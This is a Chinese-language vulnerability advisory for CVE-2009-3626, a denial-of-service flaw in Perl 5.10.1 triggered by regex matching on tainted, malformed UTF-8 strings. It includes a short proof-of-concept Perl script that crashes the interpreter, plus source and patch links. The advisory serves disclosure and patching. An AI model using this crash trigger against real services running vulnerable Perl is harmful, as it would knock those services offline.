Perl UTF-8正则表达式处理拒绝服务漏洞
发布日期:2009-10-25
更新日期:2009-10-27
受影响系统:Larry Wall Perl 5.10.1
描述:
BUGTRAQ ID:
36812
CVE(CAN) ID:
CVE-2009-3626
Perl是一种免费且功能强大的编程语言。
当Perl进程在处理某些混淆的垃圾邮件消息时,将包含有utf-8字符的字符串匹配到特定的正则表达式时会触发分段错误,导致解释器崩溃。
<*来源:Mark Martinec (
Mark.Martinec@ijs.si)
链接:
http://secunia.com/advisories/37144/
http://rt.perl.org/rt3/Ticket/Attachment/617489/295383/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl -T
use strict;
# Here is a HTML snippet from a malicious/obfuscated mail message.
# Note the last character has an invalid and huge UTF-8 code
# (as a result of an unrelated bug in HTML::Parser).
#
my $t = '<a>Attention Homeοωnөrs...1ѕt '.
'Tімe Eνө􆞃</a>';
$t =~ s/&#(\d+)/chr($1)/ge; # convert HTML entities to UTF8
$t .= substr($ENV{PATH},0,0); # make it tainted
# show character codes in the resulting string
print join(", ", map {ord} split(//,$t)), "\n";
# The following regexp evaluation crashes perl 5.10.1 on FreeBSD.
# Note that $t must be tainted and must have the UTF8 flag on,
# otherwise the crash seems to be avoided.
$t =~ /( |\b)(http:|www\.)/i;
建议:
厂商补丁:
Larry Wall
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://perl5.git.perl.org/perl.git/commitdiff/0abd0d78a73da1c4d13b1c700526b7e5d03b32d4浏览次数:2037
严重程度:0(网友投票)
